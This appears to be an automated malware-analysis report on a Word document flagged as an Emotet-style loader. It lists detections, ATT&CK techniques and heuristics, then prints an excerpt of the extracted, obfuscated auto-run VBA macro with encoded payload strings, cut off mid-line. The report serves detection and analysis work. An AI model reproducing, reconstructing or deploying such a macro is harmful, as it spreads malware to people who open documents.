Verdict: MALICIOUS
Risk score: 224

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The file contains a VBA macro with an AutoOpen function, indicating it is designed to execute automatically upon opening. The macro utilizes CreateObject and appears to be obfuscated, likely to download and execute a second-stage payload. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature.
Heuristics (8)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- CreateObject call (high, OLE_VBA_CREATEOBJ): CreateObject call
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 37980 bytes |

SHA-256: 6218d1a7b8e6dbc4033402fdedc78ded3c9e9d80ee7e0e7fdaafa5dc432b9577

Detection (ClamAV): No threats found
Obfuscation or payload: likely. Carved artifact contains 19 long base64-like blob(s).
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "OzPUjQsXtZD"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zcvIrWGQsTXUK"
Function nHAKuWPbNdP()
On Error Resume Next
rVzqTM = 79078 / Round(VlDCw) + HzjCsA - CStr(33129) * qnZXnB * DKhWt * ZrKEcq * RicIjR
XsTzi = siMRw
EjYIXMsbau = kVwSW("mAMAAyAGQAMgBlAGUAMwA1ADcAMQA1ADcANwA5AGUAOQAxAGIAMQAzADgAZgBhADYAYwA1ADUAYwA1AGEAZQBkADMAkuKmil", 2, 89)
niSaV = 62729 / Round(wiGWz) + JfhLK - CStr(32503) * VwwLrj * htuitI * DDzEG * bUXRVV
UjKTBA = DrjHi
qiJvFN = 63661 / Round(OwuSaI) + UhwWrH - CStr(87633) * TzmaN * dTcKU * AIaOz * DYQAp
czhim = Aqzcq
CUspZEi = kVwSW("BqUAOABjADEAYwBiADgAMohrM", 3, 18)
TmTXkd = 33418 / Round(FnlMG) + WaDVpS - CStr(16680) * wPbwj * JiYYS * vMwjnn * hKpMUY
zZmbm = pzoEw
nbDCF = 48646 / Round(rruoW) + TwJYaE - CStr(58092) * KcMYj * HzwJh * XaIOY * Rcutts
dYfXjF = iWdwqd
uAwYCBR = kVwSW("KBJqkAA0ADgAOAA1AGYAZQAwAGIAMgAwADkAOABiAGMAYQBiADIANQBmADMAYQAzAGQAMgA3AGIANAAzAD6l", 6, 77)
EEsvk = 14744 / Round(Htpuz) + mBHRjU - CStr(68572) * wbbQD * hAzJY * UNXBzI * iVfqdj
ocPLP = tWHcQ
CGbuF = 31214 / Round(INCSW) + wdrba - CStr(73044) * zuOoq * klVLSa * jhSvOf * qFGjC
ZCZcDw = hUIrm
DGKSldIl = kVwSW("Hu8dQA0AGYAYgA5ADcAZQA0AGIAYQBhAGMAZgA3ADAANAA5AGMANgBhAGUAZAA2ADQAYQBlADkAYQBhAGEANgBuRP", 5, 81)
PfbnC = 70810 / Round(iqRLwN) + hjsnhm - CStr(22468) * iLsHT * GOYaI * QYPRE * KwjlOj
DYwcVK = szwPvu
cqhik = 34584 / Round(lpzbho) + cLCREJ - CStr(26662) * LiJwL * ijrwz * BLtnF * ctvNF
OvidqI = JGZiwV
zkRtm = kVwSW("EBOgAzADYAMAA4AGMAYgAxAGYAZgBkADEAOQA3ADkAZgAyADIAYwBjADYAMABmAGIAMwBlADgANgA4AGQANgAwAGMAMQBmADkAMAA2ADEAYwBhADIAYQBiADgANQA3ADIE kuMM", 4, 126)
GaDFHi = 64127 / Round(dQSOLh) + UIzcVj - CStr(29969) * FtjzqH * huSUPC * pGaGoR * LbzRc
QjWzBr = wMYjqT
OLDjN = 59805 / Round(njvtmX) + vpBhGj - CStr(36754) * fNjiL * wHGTO * bXuuLN * AFOOO
HwPlw = fwFfq
omYowNwvPL = kVwSW("l8@GXYANgBhAGQAYgA0AGQAYgBlAGEAYwA1AGQAZQBiADkAMQAxADIAMABjAGEAZgA0ADcANABhADgAZgAyADEAYgBjADQAMgAxADMAaSS", 6, 98)
iTiob = 78835 / Round(YowYu) + WsTSC - CStr(33893) * UaEWiW * uimWr * tculM * ZoqPIa
dcjMd = OrfIO
BdwPB = 69263 / Round(zfsmoI) + NXNQPL - CStr(82549) * hTXswR * QYWiV * XzDKHk * maGUu
lCFok = JKwirJ
vdsGVtF = kVwSW("OOS5kZUAMQA0ADYAYQAyAGMAMAAxADIAMw@R", 7, 28)
KpOUPK = 75520 / Round(pYJFHb) + EGMCzw - CStr(60838) * LjlqL * bULBW * NXGrK * Bwivi
MVGqRp = mfjDl
zRWQU = 86814 / Round(vHZVtw) + fjsAs - CStr(13261) * bWPqB * OJnvI * tIWOF * tcirB
IKZjwQ = TTzYu
jwIZGfDD = kVwSW("N,lqNANABlADMAMgBhAGEANwA0ADgANwAxADQBEiu", 6, 32)
ZSsZl = 39378 / Round(MdEMJV) + fziWjV - CStr(41131) * rbiNXv * wwkcHf * ACwXY * iFNXad
UoboZ = sbRrXz
UZYhwv = 34782 / Round(aYwmj) + nXhFXJ - CStr(11068) * VArGw * pVRiB * KLiaEi * KDTWO
jOPZai = XIDYpr
RFQiQhVR = kVwSW("u MOZFgBlADYANABlADMAYgBhAGQAZQAzADkANAA5ADgANwAyADMANQAwAGQAOQA3AGMAOQBlAGYAOAA2ADQANgA3AGEAMwA0ADIAOAA0AGQANQBiADEANwA5AGMANwAwADEAMABiAGEAYQAzAGEAOQA3AGMANQBhAGEAMgA0AGYAMwAzADEAMgA5ADUANwBiAGUAMQA5qqa", 7, 195)
RfEHQk = 11623 / Round(bsGAs) + vJCidY - CStr(24635) * awrzXD * IGlMj * fzLFi * OmWSZp
bwAtMT = iFHPQM
aPOzrK = 43348 / Round(vZOzi) + wjJJAq - CStr(22592) * VWPljz * zjwRaE * AMimY * NQDwB
YVVKjq = ctsiG
WsXzv = kVwSW("SP0BlADUAZAA5ADgAMgBmADUANQAxAGEAYwAwADQAZgBlADUAYwA5ADcAOQBiADQAYQBmAGMANABhAGMAMAA5AGIAYQBhAGIAYwA3ADEAZgAyADgANQBkAGUAOQA0ADMAMAAxAGYAMwAzADYAMQBjADYAZgAwADgAZQAzsIJmZ", 4, 162)
WWwsSj = 13913 / Round(mjwbOR) + kETSk - CStr(73436) * PdVPbG * SIibIB * RYlQtM * pYjSYS
oYQWrv = SWCFA
wCktj = 19640 / Round(szZww) + jQdHjk - CStr(53919) * BpXwXD * sWjAlX * iUJdM * wFUqL
lOUjQh = hwMMvL
TzErIzXbqq = kVwSW("r JXAGQAMABkADAAZgA2ADMANwAzADgAOAA1AGIAYgBhAGQAMQBlADAANABiAGMANABiAGUANwA3ADIAMAA0ADQAYgAxADYANwA0ASR", 5, 97)
szcqw = 24497 / Round(TiJwCX) + ivVhn - CStr(78764) * OXnSS * pTWHOR * czcir * FSfLkN
mCArf = Xodbp
BcPwR = 71116 / Round(nmGcFG) + pmOSl - CStr(7
... (truncated)